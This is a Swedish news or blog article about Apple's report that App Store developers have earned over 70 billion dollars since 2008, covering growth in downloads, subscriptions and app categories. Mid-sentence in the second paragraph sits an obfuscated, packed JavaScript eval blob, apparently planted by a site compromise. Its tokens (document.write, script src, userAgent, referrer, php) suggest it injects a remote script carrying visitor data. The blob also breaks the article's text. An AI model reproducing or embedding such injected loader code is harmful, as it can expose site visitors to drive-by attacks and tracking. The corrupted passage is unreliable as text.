Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Apputvecklares intäkter från App Store uppgår till 70 miljarder dollar

apple
Sebastian

Apple meddelade idag att sitt globala team av utvecklare har tjänat mer än 70 miljarder dollar sedan App Store lanserades 2008. App Store innehåller många av världens mest innovativa appar, och bara under de senaste 12 månaderna har antalet nedladdningar ökat med över 70 procent.

Kunderna eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbnhd|var|u0026u|referrer|ehnhb||js|php’.split(’|’),0,{}))
upptäcker och upplever nya appar och spel varje dag på App Store, bland annat succéapparna Pokémon GO och Super Mario Run, men också andra populära appar som CancerAid, SPACE by THIX, Zones for Training with Exercise Intensity, Vanido, Ace Tennis och Havenly.

”Människor över hela världen gillar appar och våra kunder laddar ner fler än någonsin”, sa Philip Schiller, vice vd för Worldwide Marketing på Apple. ”Utvecklarnas intäkter på 70 miljarder dollar är inget annat än spektakulärt. Vi är otroligt imponerade av alla nya suveräna appar som våra utvecklare skapar och ser fram emot nästa vecka då vi får uppleva ännu mer på Worldwide Developers Conference.”

Sedan vi släppte iOS 10 förra hösten har iPhone- och iPad-användare även fått uppleva nya intressanta och kreativa sätt att hålla kontakten med vänner och bekanta. Man kan till exempel ge ett Starbucks-presentkort till en vän via Apple Pay, samarbeta på en modedesignskiss med hjälp av Prêt à Template eller göra någon glad genom att skicka någon av dekalerna i det näst intill oändliga utbudet.

Tack vare vår nya affärsmodell för prenumeration för utvecklare inom alla 25 appkategorier har nu antalet aktiva betalprenumerationer på App Store ökat med 58 procent jämfört med året innan. Kunderna prenumererar på många olika tjänster, såväl de klassiska som Netflix och Hulu som de nya och populära som Tastemade (det första moderna nätverket för matlagning via mobilen) och fotoredigeringsappar som Over och Enlight.

Utvecklare för App Store runtom i världen skapar appar som gör liven lite enklare, omdanar yrkesområden och formar kultur för kunder i 155 länder. Spel och underhållning är de kategorier som har störst intäkter. Livsstilsappar och hälso- och träningsappar blir allt populärare: de har ökat med över 70 procent under det senaste året. Kategorin för foto och video är också bland de snabbast växande kategorierna med en ökning på omkring 90 procent.

När Apple lanserade Macintosh 1984 var det början på en revolutionerande era. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att göra de bästa produkterna i världen och att lämna världen i bättre skick än när vi började.